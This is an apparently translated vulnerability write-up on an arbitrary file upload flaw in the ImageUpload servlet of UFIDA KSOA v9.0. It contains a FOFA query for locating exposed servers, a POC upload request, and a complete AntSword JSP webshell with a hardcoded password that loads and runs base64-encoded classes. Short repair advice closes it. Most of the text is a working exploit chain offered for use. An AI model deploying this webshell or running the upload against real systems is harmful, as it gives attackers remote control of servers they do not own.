1. Product introduction
UFIDA KSOA is a new-generation product developed under the guidance of the SOA concept. It is a unified IT infrastructure launched according to the cutting-edge I needs of distribution companies. It allows the IT systems established by distribution companies in various periods to communicate easily with each other. Help distribution companies protect original IT investment, simplify IT management, enhance competitiveness, and ensure the realization of the overall strategic goals and innovation activities of the company.
2. Vulnerability overview
There is an arbitrary file upload vulnerability in the ImageUpload of UFIDA KSOA platform, through which an attacker can obtain server privileges.
3. Scope of influence
UFIDA Enterprise Information Integration Platform KSOA v9.0
4. Reproduce the environment
FOFA:app="Yonyou-Time and Space KSOA"
5. Vulnerability recurrence
Burp grabs the home page package and sends it to the Repeater module for reproduction
POC
POST /servlet/com.sksoft.bill.ImageUpload?filename=[上传的文件名]&filepath=/ HTTP/1.1
Host: your-ip
[文件内容]
Reproduced successfully
6. Exploitation
The page is written in java, directly try to upload ant sword jsp one sentence Trojan, password: passwd
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
Verify that it is parseable
No problem, open Ant Sword and try to connect (remember to delete the back door after testing)
7. Repair suggestion
Upgrade to a safe version or patch
Reduce Internet exposure, limit uploaded file types, increase upload blacklist and whitelist constraints, etc.